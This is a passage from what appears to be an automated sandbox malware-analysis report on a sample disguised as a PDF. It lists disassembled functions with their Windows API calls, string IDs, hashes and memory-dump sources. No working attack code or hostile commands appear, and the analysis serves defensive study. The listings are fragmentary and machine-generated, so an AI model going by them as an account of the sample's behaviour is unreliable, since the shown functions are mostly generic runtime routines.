                                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00AE20D3
                                                                          • KillTimer.USER32(-00000001,?,?,?,?,00AE16CB,00000000,?,?,00AE1AE2,?,?), ref: 00AE216E
                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00B1BEF6
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AE16CB,00000000,?,?,00AE1AE2,?,?), ref: 00B1BF27
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AE16CB,00000000,?,?,00AE1AE2,?,?), ref: 00B1BF3E
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AE16CB,00000000,?,?,00AE1AE2,?,?), ref: 00B1BF5A
                                                                          • DeleteObject.GDI32(00000000), ref: 00B1BF6C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 641708696-0
                                                                          • Opcode ID: e0b229ad26ab8420dafbb8bd457aecf3e9c9e4bfb5606539f7fa91839f419572
                                                                          • Instruction ID: cf6576b44f666b0040690a3d0dec25d4f0776f98ef13c1511eb5084e8d8b294f
                                                                          • Opcode Fuzzy Hash: e0b229ad26ab8420dafbb8bd457aecf3e9c9e4bfb5606539f7fa91839f419572
                                                                          • Instruction Fuzzy Hash: A661BA71100691DFCB359F16DD49B3AB7F9FB41312F54856AE442879A0CB79AC81CF80
                                                                          Function 00AE21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AE25EC
                                                                          • GetSysColor.USER32(0000000F), ref: 00AE21D3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ColorLongWindow
                                                                          • String ID:
                                                                          • API String ID: 259745315-0
                                                                          • Opcode ID: 80cbfb4ed55bc054f2e5389cf931b59e3f847ee7d8612d55e4087704c710e22a
                                                                          • Instruction ID: bb35bccfe8f7c326be2e4222836dbfef6c9347c8143f9d30248c2b178e726613
                                                                          • Opcode Fuzzy Hash: 80cbfb4ed55bc054f2e5389cf931b59e3f847ee7d8612d55e4087704c710e22a
                                                                          • Instruction Fuzzy Hash: B041B531040180AFDB255F29EC48BF93BA9FB06331F184265FE659B1E6CB758D82DB21
                                                                          Function 00B4AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?,00B6F910), ref: 00B4AB76
                                                                          • GetDriveTypeW.KERNEL32(00000061,00B9A620,00000061), ref: 00B4AC40
                                                                          • _wcscpy.LIBCMT ref: 00B4AC6A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                          • API String ID: 2820617543-1000479233
                                                                          • Opcode ID: 7c7744f89a870919e0d70e3ee7d2f5301430fbd6bfc57421bd7f262071890a3e
                                                                          • Instruction ID: daee007eb659ddb083db78ffc9f7b3870d7b7ee035a7a8d6803a42c5d7e98eba
                                                                          • Opcode Fuzzy Hash: 7c7744f89a870919e0d70e3ee7d2f5301430fbd6bfc57421bd7f262071890a3e
                                                                          • Instruction Fuzzy Hash: 5251AC31158341ABC710EF14C991AAEBBE5EF94300F5048ADF886972E2DB319E09DA53
                                                                          Function 00AE9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __i64tow__itow__swprintf
                                                                          • String ID: %.15g$0x%p$False$True
                                                                          • API String ID: 421087845-2263619337
                                                                          • Opcode ID: 8e027d7162ddc7fd07da0f76f29a86716e422de86ab3ccb3e1c410345378c988
                                                                          • Instruction ID: 8c932cc3d6ed69352457dd72033b429f685d0f6dcc50a4a19b91967dfb12c05b
                                                                          • Opcode Fuzzy Hash: 8e027d7162ddc7fd07da0f76f29a86716e422de86ab3ccb3e1c410345378c988
                                                                          • Instruction Fuzzy Hash: 6741BF71604306AADB24AB39D842FBBB7F8EF44340F2044EEE549D72A2EA71D941DB11
                                                                          Function 00B673C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B673D9
                                                                          • CreateMenu.USER32 ref: 00B673F4
                                                                          • SetMenu.USER32(?,00000000), ref: 00B67403
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B67490
                                                                          • IsMenu.USER32(?), ref: 00B674A6
                                                                          • CreatePopupMenu.USER32 ref: 00B674B0
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B674DD
                                                                          • DrawMenuBar.USER32 ref: 00B674E5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                          • String ID: 0$F
                                                                          • API String ID: 176399719-3044882817
                                                                          • Opcode ID: 21d9206e9d4d278839f9300b2d95a147a8d0d3ae56d84c936d814c11999a627d
                                                                          • Instruction ID: 8a646726804c1eea7e8736a42d92e313243918852d337978b71ff9c1d96e19f5
                                                                          • Opcode Fuzzy Hash: 21d9206e9d4d278839f9300b2d95a147a8d0d3ae56d84c936d814c11999a627d
                                                                          • Instruction Fuzzy Hash: FB414975A01205EFDB10DF64E888AAABBF9FF49304F144069E956973A0DF78AD10CF90
                                                                          Function 00B6772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B677CD
                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00B677D4
                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B677E7
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00B677EF
                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B677FA
                                                                          • DeleteDC.GDI32(00000000), ref: 00B67803
                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00B6780D
                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B67821
                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B6782D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                          • String ID: static
                                                                          • API String ID: 2559357485-2160076837
                                                                          • Opcode ID: b3ca9e939a06ad3cb13d63765c3c728d835b7583b802030e7788a918ce58f38e
                                                                          • Instruction ID: 7754f68c5ce90e36181e2563076b71b89422b710866294133562feb326554bf4
                                                                          • Opcode Fuzzy Hash: b3ca9e939a06ad3cb13d63765c3c728d835b7583b802030e7788a918ce58f38e
                                                                          • Instruction Fuzzy Hash: 22318F31104115ABDF119FA5EC09FEA3BA9FF09325F100264FA15A70E0CB79DC11DBA4
                                                                          Function 00B07040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B0707B
                                                                            • Part of subcall function 00B08D68: __getptd_noexit.LIBCMT ref: 00B08D68
                                                                          • __gmtime64_s.LIBCMT ref: 00B07114
                                                                          • __gmtime64_s.LIBCMT ref: 00B0714A
                                                                          • __gmtime64_s.LIBCMT ref: 00B07167
                                                                          • __allrem.LIBCMT ref: 00B071BD
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B071D9
                                                                          • __allrem.LIBCMT ref: 00B071F0
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B0720E
                                                                          • __allrem.LIBCMT ref: 00B07225
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B07243
                                                                          • __invoke_watson.LIBCMT ref: 00B072B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                          • String ID:
                                                                          • API String ID: 384356119-0
                                                                          • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                                          • Instruction ID: 2d08b8fb1f3e5f13dd67d2a5474c1b4fe1b1afe46fafb23360c0ddd991bc59ff
                                                                          • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                                          • Instruction Fuzzy Hash: B671C371E44716ABE7149E79CC81B9AFBE8EF11720F1442BAF414E62C1FB70EA408790
                                                                          Function 00B42A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B42A31
                                                                          • GetMenuItemInfoW.USER32(00BA6890,000000FF,00000000,00000030), ref: 00B42A92
                                                                          • SetMenuItemInfoW.USER32(00BA6890,00000004,00000000,00000030), ref: 00B42AC8
                                                                          • Sleep.KERNEL32(000001F4), ref: 00B42ADA
                                                                          • GetMenuItemCount.USER32(?), ref: 00B42B1E
                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00B42B3A
                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00B42B64
                                                                          • GetMenuItemID.USER32(?,?), ref: 00B42BA9
                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B42BEF
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B42C03
                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B42C24
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                          • String ID:
                                                                          • API String ID: 4176008265-0
                                                                          • Opcode ID: 2b609247ff403adaa76cb81eab6dba506408cb648e0829ca0b6509f502d12fb9
                                                                          • Instruction ID: a3c104eb4a0a29a3c607e3169276d8c03a6d933b777cd0383b7b78ecbb04aff8
                                                                          • Opcode Fuzzy Hash: 2b609247ff403adaa76cb81eab6dba506408cb648e0829ca0b6509f502d12fb9
                                                                          • Instruction Fuzzy Hash: 7B6190B0900249AFDF11CF64D888EBEBBF8EB45304F940599F84297291DB71AE45FB21
                                                                          Function 00B67192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B67214
                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B67217
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6723B
                                                                          • _memset.LIBCMT ref: 00B6724C
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B6725E
                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B672D6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow_memset
                                                                          • String ID:
                                                                          • API String ID: 830647256-0
                                                                          • Opcode ID: 1c1fbc664f641ce628ece3526af70b5ff0eb6d09db9b958f2fa179cca404ad31
                                                                          • Instruction ID: 5cc27b43e204afa7ff088ce1595a565c6a4136ecebdddeb15c38ba2cc7211910
                                                                          • Opcode Fuzzy Hash: 1c1fbc664f641ce628ece3526af70b5ff0eb6d09db9b958f2fa179cca404ad31
                                                                          • Instruction Fuzzy Hash: FF616C71940208AFDB10DFA4CC81EEE77F8EB09714F14019AFA15A73A1DB74AD45DB64
                                                                          Function 00B3710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B37135
                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00B3718E
                                                                          • VariantInit.OLEAUT32(?), ref: 00B371A0
                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B371C0
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00B37213
                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B37227
                                                                          • VariantClear.OLEAUT32(?), ref: 00B3723C
                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00B37249
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B37252
                                                                          • VariantClear.OLEAUT32(?), ref: 00B37264
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B3726F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                          • String ID:
                                                                          • API String ID: 2706829360-0
                                                                          • Opcode ID: ec9e3b5b6544bdbdd28552c91380fa8043dedd9f669e9ce8bc0a03edde5876e2
                                                                          • Instruction ID: 8aca950f4c1f54d635a97b02a0471b03e3fdc71195c1a45848368d93c3166602
                                                                          • Opcode Fuzzy Hash: ec9e3b5b6544bdbdd28552c91380fa8043dedd9f669e9ce8bc0a03edde5876e2
                                                                          • Instruction Fuzzy Hash: A3413A75A04219AFCF10DFA8DC489AEBBF8FF08354F1080A9E915A7361CF74A945CB90
                                                                          Function 00B55A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00B55AA6
                                                                          • inet_addr.WSOCK32(?,?,?), ref: 00B55AEB
                                                                          • gethostbyname.WSOCK32(?), ref: 00B55AF7
                                                                          • IcmpCreateFile.IPHLPAPI ref: 00B55B05
                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B55B75
                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B55B8B
                                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B55C00
                                                                          • WSACleanup.WSOCK32 ref: 00B55C06
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                          • String ID: Ping
                                                                          • API String ID: 1028309954-2246546115
                                                                          • Opcode ID: 014512cf8be94bde41bb3c1d743f30a56cd7ad7cefd2a9f356ef317c20177abd
                                                                          • Instruction ID: 6330e6ca962c0754dbfd29f397981d5b0b80a9a0ca0bd34011897b33687fee52
                                                                          • Opcode Fuzzy Hash: 014512cf8be94bde41bb3c1d743f30a56cd7ad7cefd2a9f356ef317c20177abd
                                                                          • Instruction Fuzzy Hash: E151AF716047019FDB20AF25DD99B2AB7E4EF48312F1489AAF955DB2E1DB70EC04CB42
                                                                          Function 00B4B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00B4B73B
                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B4B7B1
                                                                          • GetLastError.KERNEL32 ref: 00B4B7BB
                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00B4B828
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                          • API String ID: 4194297153-14809454
                                                                          • Opcode ID: 3791b2b36c197d803c4a8f06acc6322fe2e563f223558b31db03245004e98e22
                                                                          • Instruction ID: 2bc3cab7442b5a25a983484f1c325c29dccfcffe594098f1f8ff1dcddc27aa03
                                                                          • Opcode Fuzzy Hash: 3791b2b36c197d803c4a8f06acc6322fe2e563f223558b31db03245004e98e22
                                                                          • Instruction Fuzzy Hash: 73316135A00205AFDB10EF64D885EBE7BF8EF45740F1480A9E602E7291DB71DE42DB91
                                                                          Function 00B39471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                            • Part of subcall function 00B3B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B3B0E7
                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B394F6
                                                                          • GetDlgCtrlID.USER32 ref: 00B39501
                                                                          • GetParent.USER32 ref: 00B3951D
                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B39520
                                                                          • GetDlgCtrlID.USER32(?), ref: 00B39529
                                                                          • GetParent.USER32(?), ref: 00B39545
                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B39548
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 1536045017-1403004172
                                                                          • Opcode ID: b68b11c0d52c6c9f8e2d7df8ab5c176d7734b916c91369c121841ab3ed3c5a0f
                                                                          • Instruction ID: 3271bb3d107999d3e068c8db6e6caef28fcaa914712d19893b5e4ae19fec9ae3
                                                                          • Opcode Fuzzy Hash: b68b11c0d52c6c9f8e2d7df8ab5c176d7734b916c91369c121841ab3ed3c5a0f
                                                                          • Instruction Fuzzy Hash: 6621C470D00204BBCF05AB65DC85DFEBBB8EF59300F204169F562972E1DBB95919DB20
                                                                          Function 00B3955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                            • Part of subcall function 00B3B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B3B0E7
                                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00B395DF
                                                                          • GetDlgCtrlID.USER32 ref: 00B395EA
                                                                          • GetParent.USER32 ref: 00B39606
                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B39609
